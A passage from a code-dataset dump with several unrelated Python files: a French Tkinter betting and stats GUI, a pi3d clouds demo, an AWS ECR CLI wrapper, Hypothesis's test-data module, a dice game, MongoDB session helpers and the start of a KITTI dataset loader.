'000001'\r\n #aujourd'hui\r\n date_ref = datetime.datetime.today()\r\n #liste des divisions\r\n liste_division = self.cl.liste_division(code,date_ref)\r\n\r\n #label site\r\n self.labelSite = ttk.Label(self.master, text='Site',width = 20)\r\n self.labelSite.grid(row=0, column=0,padx=0,pady=0)\r\n #entry site\r\n self.Site = ttk.Entry(self.master, width = 20)\r\n self.Site.grid(row=1, column=0, padx=5,pady=5)\r\n\r\n\r\n #label code fonds\r\n self.labelcodeFonds = ttk.Label(self.master, text='Code fonds',width = 20)\r\n self.labelcodeFonds.grid(row=0, column=4,padx=0,pady=0)\r\n #entry division\r\n self.codeFonds = ttk.Entry(self.master, width = 20)\r\n self.codeFonds.grid(row=1, column=4, padx=5,pady=5)\r\n self.codeFonds.insert(tk.END,code)\r\n\r\n\r\n #label division\r\n self.labelDiv = ttk.Label(self.master, text='Choix de la division',width = 20)\r\n self.labelDiv.grid(row=0, column=2,padx=0,pady=0)\r\n #combobox choix de la div\r\n self.choixDiv = ttk.Combobox(self.master, width = 20,values = liste_division)\r\n self.choixDiv.grid(row=1, column=2, padx=5,pady=5)\r\n\r\n #label saison\r\n self.labelSaison = ttk.Label(self.master, text='Choix de la saison',width = 20)\r\n self.labelSaison.grid(row=2, column=2,padx=0,pady=0)\r\n #combobox choix de la saison\r\n self.choixSaison = ttk.Combobox(self.master, width = 20,\r\n postcommand = lambda:self.update_saison(code,date_ref,self.choixDiv.get()))\r\n self.choixSaison.grid(row=3, column=2, padx=5,pady=5)\r\n\r\n\r\n\r\n #label HomeTeam\r\n self.labelHT = ttk.Label(self.master, text='Equipe domicile',width = 20)\r\n self.labelHT.grid(row=3, column=0,padx=0,pady=0)\r\n #combobox HT\r\n self.choixHT = ttk.Combobox(self.master, postcommand = lambda : self.update_team(\r\n code,date_ref,\"HomeTeam\",self.choixHT,\r\n saison=self.choixSaison.get(),div=self.choixDiv.get()))\r\n self.choixHT.grid(row=4, column=0,padx=5,pady=5)\r\n\r\n #label mise HT\r\n self.labelMiseHT = ttk.Label(self.master, text=\"Mise Equipe domicile\",width = 20)\r\n self.labelMiseHT.grid(row=3, column=1,padx=0,pady=0)\r\n #entry mise HT\r\n self.miseHT= ttk.Entry(self.master)\r\n self.miseHT.grid(row=4, column=1,padx=5,pady=5)\r\n\r\n\r\n #label AwayTeam\r\n self.labelAT = ttk.Label(self.master, text=\"Equipe extérieure\",width = 20)\r\n self.labelAT.grid(row=3, column=3,padx=0,pady=0)\r\n #combobox AT\r\n self.choixAT = ttk.Combobox(self.master, postcommand = lambda : self.update_team(\r\n code,date_ref,\"AwayTeam\",self.choixAT,\r\n saison=self.choixSaison.get(),div=self.choixDiv.get()))\r\n self.choixAT.grid(row=4, column=3,padx=5,pady=5)\r\n\r\n #label mise AT\r\n self.labelMiseAT = ttk.Label(self.master, text=\"Mise Equipe extérieure\",width = 20)\r\n self.labelMiseAT.grid(row=3, column=4,padx=0,pady=0)\r\n #entry mise AT\r\n self.miseAT = ttk.Entry(self.master)\r\n self.miseAT.grid(row=4, column=4,padx=5,pady=5)\r\n\r\n #label cote\r\n self.labelOdd = ttk.Label(self.master, text=\"cote\",width = 20)\r\n self.labelOdd.grid(row=5, column=2,padx=0,pady=0)\r\n #entry cote\r\n self.Odd = ttk.Entry(self.master)\r\n self.Odd.grid(row=6, column=2,padx=5,pady=5)\r\n\r\n #label type paris\r\n self.labelTypeparis = ttk.Label(self.master, text=\"Type paris\",width = 20)\r\n self.labelTypeparis.grid(row=7, column=2,padx=0,pady=0)\r\n #entry type paris\r\n self.typeparis = ttk.Entry(self.master)\r\n self.typeparis.grid(row=8, column=2,padx=5,pady=5)\r\n self.typeparis.insert(tk.END,2)\r\n\r\n #bouton paris\r\n self.BoutonParis = ttk.Button(self.master,width = 20, text= 'ajoute paris',\r\n command = lambda: self.ajout_paris())\r\n self.BoutonParis.grid(row=9, column=2,padx=5,pady=5)\r\n\r\n #bouton VL\r\n self.BoutonVL = ttk.Button(self.master,width = 20,text= 'ajoute VL',\r\n command = lambda : self.thread_parallele(self.calcul_vl()))\r\n self.BoutonVL.grid(row=9, column=4,padx=5,pady=5)\r\n\r\n\r\n #label dateParis\r\n self.labeldateParis = ttk.Label(self.master, text=\"Date paris\",width = 20)\r\n self.labeldateParis.grid(row=6, column=0,padx=0,pady=0)\r\n #entry date Paris\r\n self.dateParis = ttk.Entry(self.master,width = 30)\r\n self.dateParis.grid(row=7, column=0,padx=5,pady=5)\r\n #aujourd hui\r\n self.dateParis.insert(tk.END,datetime.datetime.today())\r\n\r\n\r\n def creation_widgets_2(self):\r\n \"\"\"Création d'un spin bouton central \"\"\"\r\n\r\n #creation d'un cadre pour les spin\r\n self.cadreSpin_2 = tk.Frame(self.master)\r\n self.cadreSpin_2.grid(row=4, column=1, padx=10,pady=10)\r\n #Création du spin bouton de gauche\r\n self.SpinGauche_2 = tk.Button(self.cadreSpin_2, image=self.tk_flechegauche_2,width = 15, height=20)\r\n self.SpinGauche_2.pack(side='left')\r\n #Création du spin bouton de droite\r\n self.SpinDroit_2 = tk.Button(self.cadreSpin_2, image=self.tk_flechedroite_2,width = 15, height=20)\r\n self.SpinDroit_2.pack(side='right')\r\n #création d'un cadre\r\n self.cadreGauche_2 = tk.Frame(self.master)\r\n self.cadreGauche_2.grid(row=4, column=0, padx=20,pady=0)\r\n self.cadreDroit_2 = tk.Frame(self.master)\r\n self.cadreDroit_2.grid(row=4, column=3, padx=20,pady=0)\r\n #création d'une scrollbar pour la liste de gauche\r\n self.scrollbarGauche_2 = tk.Scrollbar(self.cadreGauche_2,orient=\"vertical\")\r\n self.scrollbarGauche_2.pack(side='right',fill='y')\r\n #création d'une scrollbar pour la liste de droite\r\n self.scrollbarDroite_2 = tk.Scrollbar(self.cadreDroit_2,orient=\"vertical\")\r\n self.scrollbarDroite_2.pack(side='right',fill='y')\r\n #Création de la listBox de gauche\r\n self.listeGauche_2 = tk.Listbox(self.cadreGauche_2,width = 25, height=8,yscrollcommand=self.scrollbarGauche_2.set)\r\n self.listeGauche_2.pack()\r\n #Création de la listBox de droite\r\n self.listeDroite_2 = tk.Listbox(self.cadreDroit_2,width = 25, height=8,yscrollcommand=self.scrollbarDroite_2.set)\r\n self.listeDroite_2.pack()\r\n #nom de la liSte de gauche\r\n self.Label_listeGauche_2 = tk.Label(self.master, text=\"Saisons dans la base\")\r\n self.Label_listeGauche_2.grid(row=3, column=0, padx=20,pady=5,sticky ='sw')\r\n #nom de la liste de droite\r\n self.Label_listeDroite_2 = tk.Label(self.master, text=\"Saisons sélectionnées\")\r\n self.Label_listeDroite_2.grid(row=3, column=3, padx=20,pady=5,sticky ='sw')\r\n # attache listbox à scrollbar à gauche\r\n self.scrollbarGauche_2.config(command=self.listeGauche_2.yview)\r\n # attache listbox à scrollbar à droite\r\n self.scrollbarDroite_2.config(command=self.listeDroite_2.yview)\r\n\r\n def creation_widgets(self):\r\n \"\"\"Création d'un spin bouton central \"\"\"\r\n\r\n #creation d'un cadre pour les spin\r\n self.cadreSpin = tk.Frame(self.master)\r\n self.cadreSpin.grid(row=2, column=1, padx=10,pady=10)\r\n #Création du spin bouton de gauche\r\n self.SpinGauche = tk.Button(self.cadreSpin, image=self.tk_flechegauche,width = 15, height=20)\r\n self.SpinGauche.pack(side='left')\r\n #Création du spin bouton de droite\r\n self.SpinDroit = tk.Button(self.cadreSpin, image=self.tk_flechedroite,width = 15, height=20)\r\n self.SpinDroit.pack(side='right')\r\n #création d'un cadre\r\n self.cadreGauche = tk.Frame(self.master)\r\n self.cadreGauche.grid(row=2, column=0, padx=20,pady=0)\r\n self.cadreDroit = tk.Frame(self.master)\r\n self.cadreDroit.grid(row=2, column=3, padx=20,pady=0)\r\n #création d'une scrollbar pour la liste de gauche\r\n self.scrollbarGauche = tk.Scrollbar(self.cadreGauche,orient=\"vertical\")\r\n self.scrollbarGauche.pack(side='right',fill='y')\r\n #création d'une scrollbar pour la liste de droite\r\n self.scrollbarDroite = tk.Scrollbar(self.cadreDroit,orient=\"vertical\")\r\n self.scrollbarDroite.pack(side='right',fill='y')\r\n #Création de la listBox de gauche\r\n self.listeGauche = tk.Listbox(self.cadreGauche,width = 25, height=8,yscrollcommand=self.scrollbarGauche.set)\r\n self.listeGauche.pack()\r\n #Création de la listBox de droite\r\n self.listeDroite = tk.Listbox(self.cadreDroit,width = 25, height=8,yscrollcommand=self.scrollbarDroite.set)\r\n self.listeDroite.pack()\r\n #bar de progression\r\n #self.progress=ttk.Progressbar(self.master, length=500)\r\n #self.progress.grid(row=6, column=0, padx=10,pady=10, columnspan =4)\r\n #nom de la liSte de gauche\r\n self.Label_listeGauche = tk.Label(self.master, text=\"Championnats dans la base\")\r\n self.Label_listeGauche.grid(row=1, column=0, padx=20,pady=5,sticky ='sw')\r\n #nom de la liste de droite\r\n self.Label_listeDroite = tk.Label(self.master, text=\"Championnats sélectionnés\")\r\n self.Label_listeDroite.grid(row=1, column=3, padx=20,pady=5,sticky ='sw')\r\n # attache listbox à scrollbar à gauche\r\n self.scrollbarGauche.config(command=self.listeGauche.yview)\r\n # attache listbox à scrollbar à droite\r\n self.scrollbarDroite.config(command=self.listeDroite.yview)\r\n\r\n\r\n def liste_personne(self):\r\n \"\"\"récupère la liste des personnes dans la base\"\"\"\r\n rows = self.cl.liste_personnes()\r\n return rows\r\n\r\n\r\n def liste_saison(self):\r\n \"\"\"liste saisons dans la table résultats \"\"\"\r\n rows = self.cl.liste_saisons()\r\n return rows\r\n def liste_champ(self):\r\n \"\"\"liste des championnats dans la table de mapping \"\"\"\r\n rows = self.cl.liste_championnats()\r\n return rows\r\n def liste_fonds_transpa(self):\r\n \"\"\"récupère la liste des fonds pour la transparisation \"\"\"\r\n #liste des isin et noms de portefeuilles dans le resinv et ampère\r\n rows = self.cl.fonds_tansparisation\r\n return rows\r\n\r\n def ajoute_item_liste_droite(self,champ):\r\n \"\"\"ajoute les fonds à la liste de droite\"\"\"\r\n #efface la listebox de gauche\r\n self.listeGauche.delete(0,'end')\r\n #efface la listebox de gauche\r\n self.listeDroite.delete(0,'end')\r\n #boucle sur le résultat\r\n for i, r in enumerate(champ):\r\n self.listeDroite.insert(i+1,str(r[0]) + ' - ' + str(r[1]))\r\n\r\n def ajoute_item_liste_droite_2(self,saison):\r\n \"\"\"ajoute les fonds à la liste de droite\"\"\"\r\n #efface la listebox de gauche\r\n self.listeGauche_2.delete(0,'end')\r\n #efface la listebox de gauche\r\n self.listeDroite_2.delete(0,'end')\r\n #boucle sur le résultat\r\n for i, r in enumerate(saison):\r\n self.listeDroite_2.insert(i+1,str(r[0]))\r\n\r\n def ajoute_item_liste_gauche(self,champ):\r\n \"\"\"ajoute les fonds à la liste de gauche\"\"\"\r\n #efface la listebox de gauche\r\n self.listeGauche.delete(0,'end')\r\n #efface la listebox de droite\r\n self.listeDroite.delete(0,'end')\r\n #liste des isin et noms de portefeuilles dans la abse pilote ampere\r\n #boucle sur le résultat\r\n for i, r in enumerate(champ):\r\n self.listeGauche.insert(i+1,str(r[0]) + ' - ' + str(r[1]))\r\n\r\n def ajoute_item_liste_gauche_2(self,saison):\r\n \"\"\"ajoute les fonds à la liste de gauche\"\"\"\r\n #efface la listebox de gauche\r\n self.listeGauche_2.delete(0,'end')\r\n #efface la listebox de droite\r\n self.listeDroite_2.delete(0,'end')\r\n #liste des isin et noms de portefeuilles dans la abse pilote ampere\r\n #boucle sur le résultat\r\n for i, r in enumerate(saison):\r\n self.listeGauche_2.insert(i+1,str(r[0]))\r\n\r\n\r\n def ajoute_item_Droite_Gauche_2(self,arg):\r\n \"\"\"supprime un item dans la listBox de droite\r\n ajoute un item dans la listBox de gauche\"\"\"\r\n #index de l'élément sélectionné\r\n index = self.listeDroite_2.curselection()\r\n #nom de l'élément sélectionné\r\n nom_element_droite= self.listeDroite_2.get(index)\r\n #initialise le boolean\r\n bol = False\r\n #boucle sur les éléments de la listBox de gauche\r\n for i in range(0,self.listeGauche_2.size()):\r\n if nom_element_droite < self.listeGauche_2.get(i):\r\n #ajoute l'element dans la liste de gauche\r\n self.listeGauche_2.insert(i,nom_element_droite)\r\n #flag true\r\n bol = True\r\n break\r\n #si le nom est le plus grand\r\n if bol == False:\r\n #ajoute l'élément à la fin\r\n self.listeGauche_2.insert(self.listeGauche_2.size(),nom_element_droite)\r\n #supprime l'élément dans la listBox de droite\r\n self.listeDroite_2.delete(index)\r\n bol = False\r\n\r\n def ajoute_item_Gauche_Droite_2(self,arg):\r\n \"\"\"supprime un item dans la listBox de droite\r\n ajoute un item dans la listBox de gauche\"\"\"\r\n #index de l'élément sélectionné\r\n index = self.listeGauche_2.curselection()\r\n #nom de l'élément sélectionné\r\n nom_element_gauche = self.listeGauche_2.get(index)\r\n #initialise le boolean\r\n bol = False\r\n #boucle sur les éléments de la listBox de droite\r\n for i in range(0,self.listeDroite_2.size()):\r\n #si le nom est plus petit\r\n if nom_element_gauche < self.listeDroite_2.get(i):\r\n #ajoute l'element dans la liste de droite\r\n self.listeDroite_2.insert(i,nom_element_gauche)\r\n bol = True\r\n break\r\n #si le nom est le plus grand\r\n if bol == False:\r\n #ajoute l'élément à la fin\r\n self.listeDroite_2.insert(self.listeDroite_2.size(),nom_element_gauche)\r\n #supprime l'élément dans la listBox de gauche\r\n self.listeGauche_2.delete(index)\r\n bol = False\r\n\r\n def ajoute_item_Droite_Gauche(self,arg):\r\n \"\"\"supprime un item dans la listBox de droite\r\n ajoute un item dans la listBox de gauche\"\"\"\r\n #index de l'élément sélectionné\r\n index = self.listeDroite.curselection()\r\n #nom de l'élément sélectionné\r\n nom_element_droite= self.listeDroite.get(index)\r\n #initialise le boolean\r\n bol = False\r\n #boucle sur les éléments de la listBox de gauche\r\n for i in range(0,self.listeGauche.size()):\r\n if nom_element_droite < self.listeGauche.get(i):\r\n #ajoute l'element dans la liste de gauche\r\n self.listeGauche.insert(i,nom_element_droite)\r\n #flag true\r\n bol = True\r\n break\r\n #si le nom est le plus grand\r\n if bol == False:\r\n #ajoute l'élément à la fin\r\n self.listeGauche.insert(self.listeGauche.size(),nom_element_droite)\r\n #supprime l'élément dans la listBox de droite\r\n self.listeDroite.delete(index)\r\n bol = False\r\n\r\n def ajoute_item_Gauche_Droite(self,arg):\r\n \"\"\"supprime un item dans la listBox de droite\r\n ajoute un item dans la listBox de gauche\"\"\"\r\n #index de l'élément sélectionné\r\n index = self.listeGauche.curselection()\r\n #nom de l'élément sélectionné\r\n nom_element_gauche = self.listeGauche.get(index)\r\n #initialise le boolean\r\n bol = False\r\n #boucle sur les éléments de la listBox de droite\r\n for i in range(0,self.listeDroite.size()):\r\n #si le nom est plus petit\r\n if nom_element_gauche < self.listeDroite.get(i):\r\n #ajoute l'element dans la liste de droite\r\n self.listeDroite.insert(i,nom_element_gauche)\r\n bol = True\r\n break\r\n #si le nom est le plus grand\r\n if bol == False:\r\n #ajoute l'élément à la fin\r\n self.listeDroite.insert(self.listeDroite.size(),nom_element_gauche)\r\n #supprime l'élément dans la listBox de gauche\r\n self.listeGauche.delete(index)\r\n bol = False\r\n \r\n\r\n def activate_desactivate(self,statut):\r\n \"\"\"active ou désactive les widgets \"\"\"\r\n for child in self.master.winfo_children():\r\n if str(child) != '.!menu':\r\n try:\r\n child.configure(state=statut)\r\n except:\r\n pass\r\n\r\n def calcul_stats_2(self):\r\n \"\"\"calcul les statistiques de la période\"\"\"\r\n #désactive les widgets\r\n self.activate_desactivate('disabled')\r\n #création d'une liste de championnat\r\n liste_champ = []\r\n liste_saison = []\r\n #saison\r\n nombre_saison = self.listeDroite_2.size()\r\n #si on n 'a pas choisi une saison\r\n if nombre_saison == 0:\r\n messagebox.showerror('Erreur','Veuillez sélectionner des saisons')\r\n else:\r\n #nombre de fonds sélectionnés\r\n nombre_champ = self.listeDroite.size()\r\n #si on n'a pas sélectionné de fonds\r\n if nombre_champ ==0:\r\n #message d'erreur\r\n messagebox.showerror('Erreur','Veuillez sélectionner des championnats')\r\n else:\r\n #ajoute les championnats dans une boucle\r\n for c in range(0,nombre_champ):\r\n liste_champ.append(self.listeDroite.get(c)[-2:])\r\n #ajoute les championnats dans une boucle\r\n for c in range(0,nombre_saison):\r\n liste_saison.append(self.listeDroite_2.get(c))\r\n #importation des championnats\r\n try:\r\n stats.stats_2(liste_champ,liste_saison)\r\n #Fonds transparisé avec succès\r\n messagebox.showinfo('Succès', 'statistiques calculées avec succès')\r\n except Exception as e:\r\n messagebox.showerror('Erreur',str(e))\r\n\r\n #active les widgets\r\n self.activate_desactivate('normal')\r\n\r\n def ajoute_resultats(self):\r\n \"\"\"ajoute le resultat des championnats sélectionnés \"\"\"\r\n #désactive les widgets\r\n self.activate_desactivate('disabled')\r\n #création d'une liste de championnat\r\n liste_champ = []\r\n #saison\r\n saison = self.TextBox_saison.get()\r\n #si on n 'a pas choisi une saison\r\n if saison == '':\r\n messagebox.showerror('Erreur','Veuillez saisir une saison')\r\n else:\r\n liste_saison = [saison]\r\n #nombre de fonds sélectionnés\r\n nombre_champ = self.listeDroite.size()\r\n #si on n'a pas sélectionné de fonds\r\n if nombre_champ ==0:\r\n #message d'erreur\r\n messagebox.showerror('Erreur','Veuillez sélectionner des fonds')\r\n else:\r\n #ajoute les championnats dans une boucle\r\n for c in range(0,nombre_champ):\r\n liste_champ.append(self.listeDroite.get(c)[-2:])\r\n #importation des championnats\r\n try:\r\n import_results.ajoute_data(liste_champ,liste_saison)\r\n #Fonds transparisé avec succès\r\n messagebox.showinfo('Succès', 'Résultats insérés avec succès')\r\n except Exception as e:\r\n messagebox.showerror('Erreur',str(e))\r\n\r\n\r\n #active les widgets\r\n self.activate_desactivate('normal')\r\n\r\n def thread_parallele(self, procedure):\r\n \"\"\"lance le reporting dans un thread parallèle\"\"\"\r\n self.thread=threading.Thread(name='Thread_parallele',target=procedure)\r\n self.thread.start()\r\n\r\nif __name__ == '__main__':\r\n fenetre = tk.Tk()\r\n fenetre.title('Gestionnaire')\r\n\r\n cla = class_gestionnaire(fenetre)\r\n fenetre.mainloop()\r\n\r\n del cla\r\n","sub_path":"userform.py","file_name":"userform.py","file_ext":"py","file_size_in_byte":33838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"355988180","text":"\n\nfrom xai.brain.wordbase.nouns._stimulus import _STIMULUS\n\n#calss header\nclass _STIMULI(_STIMULUS, ):\n\tdef __init__(self,): \n\t\t_STIMULUS.__init__(self)\n\t\tself.name = \"STIMULI\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"stimulus\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_stimuli.py","file_name":"_stimuli.py","file_ext":"py","file_size_in_byte":248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"419322719","text":"# Clouds 3D example using pi3d module\n# ===================================\n# Copyright (c) 2012 - Tim Skillman\n# \n# This example does not reflect the finished pi3d module in any way whatsoever!\n# It merely aims to demonstrate a working concept in simplfying 3D programming on the Pi\n#\n# PLEASE INSTALL PIL imaging with:\n#\n# $ sudo apt-get install python-imaging\n#\n# before running this example\n#\n# This demo needs some sorting out - the alpha's are blending with desktop\n# Solutions welcome!\n\nimport pi3d, random, time\n\nz=0\nx=0\nspeed=1\nwidex=60\nwidey = 8\ncloudno = 50\ncloud_depth = 60.0\nzd = cloud_depth / cloudno\n\ndef drawCloud(c, xx,zz):\n zzz=(zz+c[2]) % cloud_depth\n xxx=(xx+c[0])\n pi3d.sprite(clouds[c[3]], xxx,c[1],-zzz,8,5)\n \n# Setup display and initialise pi3d\nscnx = 800\nscny = 600\ndisplay = pi3d.glDisplay()\ndisplay.create(100,100,scnx,scny)\ndisplay.setBackColour(0,0.7,1,1)\n\nclouds = []\nclouds.append(pi3d.load_textureAlpha(\"Textures/cloud2.png\"))\nclouds.append(pi3d.load_textureAlpha(\"Textures/cloud3.png\"))\nclouds.append(pi3d.load_textureAlpha(\"Textures/cloud4.png\"))\nclouds.append(pi3d.load_textureAlpha(\"Textures/cloud5.png\"))\nclouds.append(pi3d.load_textureAlpha(\"Textures/cloud6.png\"))\n\n# Setup cloud positions and cloud image refs\nz = 0.0\ncxyz = []\nfor b in range (0, cloudno):\n\tcxyz.append((random.random() * widex - widex*.5, -random.random() * widey, cloud_depth-z, int(random.random() * 4) + 1))\n\tz = z + zd #(z+random.random() * 100) % 1000\n\t\nzc = 0\n\n# Fetch key presses\nmykeys = pi3d.key()\n\nwhile True:\n\t\n\tdisplay.clear()\n\t\n\tz = (z+(cloud_depth-speed)) % cloud_depth\t#zc = int((z/1000) * cloudno)\n\tzc = (zc + (cloudno-1)) % cloudno\n\n\t#attempts to resolve z-sorting of clouds\n\tfor d in range (zc, cloudno):\n\t\tdrawCloud(cxyz[d],x,z)\n\t\t\t\n\tfor d in range (0, zc):\n\t\tdrawCloud(cxyz[d],x,z)\n\n\t#Press ENTER to terminate\n\tif mykeys.read() == 10: \n\t display.destroy()\n\t break\n\t\t\n\tdisplay.swap_buffers()\n\ttime.sleep(0.01)\n","sub_path":"clouds3d.py","file_name":"clouds3d.py","file_ext":"py","file_size_in_byte":1966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"24338334","text":"#!/usr/bin/python\n# -*- codding: utf-8 -*-\nimport os\nimport sys\nsys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__))))\nfrom common.execute_command import write_two_parameter\n\n# url : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/ecr/batch-check-layer-availability.html\nif __name__ == '__main__':\n \"\"\"\n\n \"\"\"\n\n parameter_display_string = \"\"\"\n # repository-name : The name of the repository that is associated with the image layers to check.\n # layer-digests : The digests of the image layers to check.\n(string)\n \"\"\"\n add_option_dict = {}\n add_option_dict[\"parameter_display_string\"] = parameter_display_string\n # ex: add_option_dict[\"no_value_parameter_list\"] = \"--single-parameter\"\n write_two_parameter(\"ecr\", \"batch-check-layer-availability\", \"repository-name\", \"layer-digests\", add_option_dict)\n","sub_path":"ecr_write_2/check-layer-availability_batch.py","file_name":"check-layer-availability_batch.py","file_ext":"py","file_size_in_byte":869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"266012699","text":"# coding=utf-8\n#\n# This file is part of Hypothesis (https://github.com/DRMacIver/hypothesis)\n#\n# Most of this work is copyright (C) 2013-2015 David R. MacIver\n# (david@drmaciver.com), but it contains contributions by others. See\n# https://github.com/DRMacIver/hypothesis/blob/master/CONTRIBUTING.rst for a\n# full list of people who may hold copyright, and consult the git log if you\n# need to determine who owns an individual contribution.\n#\n# This Source Code Form is subject to the terms of the Mozilla Public License,\n# v. 2.0. If a copy of the MPL was not distributed with this file, You can\n# obtain one at http://mozilla.org/MPL/2.0/.\n#\n# END HEADER\n\nfrom __future__ import division, print_function, absolute_import\n\nfrom enum import IntEnum\n\nfrom hypothesis.errors import Frozen, InvalidArgument\nfrom hypothesis.internal.compat import hbytes, text_type, int_to_bytes, \\\n unicode_safe_repr, reasonable_byte_type\n\n\ndef uniform(random, n):\n return int_to_bytes(random.getrandbits(n * 8), n)\n\n\nclass Status(IntEnum):\n OVERRUN = 0\n INVALID = 1\n VALID = 2\n INTERESTING = 3\n\n\nclass StopTest(BaseException):\n\n def __init__(self, testcounter):\n super(StopTest, self).__init__(repr(testcounter))\n self.testcounter = testcounter\n\nglobal_test_counter = 0\n\n\nclass TestData(object):\n\n @classmethod\n def for_buffer(self, buffer):\n return TestData(\n max_length=len(buffer),\n draw_bytes=lambda data, n, distribution:\n buffer[data.index:data.index + n]\n )\n\n def __init__(self, max_length, draw_bytes):\n self.max_length = max_length\n self.is_find = False\n self._draw_bytes = draw_bytes\n self.overdraw = 0\n self.level = 0\n self.block_starts = {}\n self.blocks = []\n self.buffer = bytearray()\n self.output = u''\n self.status = Status.VALID\n self.frozen = False\n self.intervals_by_level = []\n self.intervals = []\n self.interval_stack = []\n global global_test_counter\n self.testcounter = global_test_counter\n global_test_counter += 1\n\n def __assert_not_frozen(self, name):\n if self.frozen:\n raise Frozen(\n 'Cannot call %s on frozen TestData' % (\n name,))\n\n @property\n def index(self):\n return len(self.buffer)\n\n def note(self, value):\n self.__assert_not_frozen('note')\n if not isinstance(value, text_type):\n value = unicode_safe_repr(value)\n self.output += value\n\n def draw(self, strategy):\n if self.is_find and not strategy.supports_find:\n raise InvalidArgument((\n 'Cannot use strategy %r within a call to find (presumably '\n 'because it would be invalid after the call had ended).'\n ) % (strategy,))\n self.start_example()\n try:\n return strategy.do_draw(self)\n finally:\n if not self.frozen:\n self.stop_example()\n\n def start_example(self):\n self.__assert_not_frozen('start_example')\n self.interval_stack.append(self.index)\n self.level += 1\n\n def stop_example(self):\n self.__assert_not_frozen('stop_example')\n self.level -= 1\n while self.level >= len(self.intervals_by_level):\n self.intervals_by_level.append([])\n k = self.interval_stack.pop()\n if k != self.index:\n t = (k, self.index)\n self.intervals_by_level[self.level].append(t)\n if not self.intervals or self.intervals[-1] != t:\n self.intervals.append(t)\n\n def freeze(self):\n if self.frozen:\n assert isinstance(self.buffer, hbytes)\n return\n self.frozen = True\n # Intervals are sorted as longest first, then by interval start.\n for l in self.intervals_by_level:\n for i in range(len(l) - 1):\n if l[i][1] == l[i + 1][0]:\n self.intervals.append((l[i][0], l[i + 1][1]))\n self.intervals = sorted(\n set(self.intervals),\n key=lambda se: (se[0] - se[1], se[0])\n )\n self.buffer = hbytes(self.buffer)\n del self._draw_bytes\n\n def draw_bytes(self, n, distribution=uniform):\n if n == 0:\n return hbytes(b'')\n self.__assert_not_frozen('draw_bytes')\n initial = self.index\n if self.index + n > self.max_length:\n self.overdraw = self.index + n - self.max_length\n self.status = Status.OVERRUN\n self.freeze()\n raise StopTest(self.testcounter)\n result = self._draw_bytes(self, n, distribution)\n self.block_starts.setdefault(n, []).append(initial)\n self.blocks.append((initial, initial + n))\n assert len(result) == n\n assert self.index == initial\n self.buffer.extend(result)\n self.intervals.append((initial, self.index))\n return reasonable_byte_type(result)\n\n def mark_interesting(self):\n self.__assert_not_frozen('mark_interesting')\n self.status = Status.INTERESTING\n self.freeze()\n raise StopTest(self.testcounter)\n\n def mark_invalid(self):\n self.__assert_not_frozen('mark_invalid')\n self.status = Status.INVALID\n self.freeze()\n raise StopTest(self.testcounter)\n","sub_path":"tsampi/pypy/lib_python-bak/hypothesis/internal/conjecture/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":5384,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"494436119","text":"import random\nkeep_going = True\nwhile keep_going:\n\n dice =[0,0,0,0,0]\n \n for i in range(5):\n\n dice[i] = random.randint(1,6)\n print(\"вам выпало:\",dice)\n if dice[0] == dice[4]:\n print(\"яцзы\")\n elif (dice[0]==dice[3]) or (dice[1]==dice[4]):\n print(\"четыре одинаковых\")\n \n elif(dice[0]==dice[2]) or (dice[1]==dice[3]) or (dice[2]==dice[4]):\n print(\"три одинаковые\")\n\n keep_going=(input(\"нажмите enter для продолжения,любую клавишу чтобы выйти:\")==\"\")\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n \n","sub_path":"PythonApps/PythonApps/Task 12.py","file_name":"Task 12.py","file_ext":"py","file_size_in_byte":623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"277622955","text":"from pymongo import MongoClient\nimport hashlib\nimport uuid\n\n\ndef find_session(email):\n client = MongoClient(\"mongodb://localhost:27017\")\n db = client.myinstagram\n\n current_session = db.sessions.find_one({'email': email})\n\n if current_session is None:\n return {\"found\": False}\n else:\n return {\"found\": True, 'username': current_session['username'], 'session_id': current_session['session_id']}\n\n\ndef new_session(username, email):\n client = MongoClient(\"mongodb://localhost:27017\")\n db = client.myinstagram\n\n salt = uuid.uuid4().hex\n session_id = hashlib.sha256(salt.encode()).hexdigest()\n\n db.sessions.insert(\n {\n 'email': email,\n 'username': username,\n 'session_id': session_id\n }\n )\n\n return session_id\n\n\ndef remove_session(email):\n client = MongoClient(\"mongodb://localhost:27017\")\n db = client.myinstagram\n db.sessions.delete_many({'email': email})\n","sub_path":"accounter/session.py","file_name":"session.py","file_ext":"py","file_size_in_byte":958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"223290862","text":"# encoding: utf-8\n# module pango\n# from /usr/lib/python2.7/dist-packages/gtk-2.0/pango.so\n# by generator 1.135\n# no doc\n\n# imports\nimport gobject as __gobject\nimport gobject._gobject as __gobject__gobject\n\n\nclass Weight(__gobject.GEnum):\n # no doc\n def __init__(self, *args, **kwargs): # real signature unknown\n pass\n\n __weakref__ = property(lambda self: object(), lambda self, v: None, lambda self: None) # default\n \"\"\"list of weak references to the object (if defined)\"\"\"\n\n\n __dict__ = None # (!) real value is ''\n __enum_values__ = {\n 100: 100,\n 200: 200,\n 300: 300,\n 380: 380,\n 400: 400,\n 500: 500,\n 600: 600,\n 700: 700,\n 800: 800,\n 900: 900,\n 1000: 1000,\n }\n __gtype__ = None # (!) real value is ''\n\n\n","sub_path":"intellij-community/system/python_stubs/-1247972723/pango/Weight.py","file_name":"Weight.py","file_ext":"py","file_size_in_byte":815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"319746977","text":"import os\nimport re\nimport h5py\nimport numpy as np\nimport torch.utils.data as data\nfrom PIL import Image\n\n\nclass KITTIDetection(data.Dataset):\n \"\"\"The KITTI Detection dataset.\n\n Args:\n root (string): 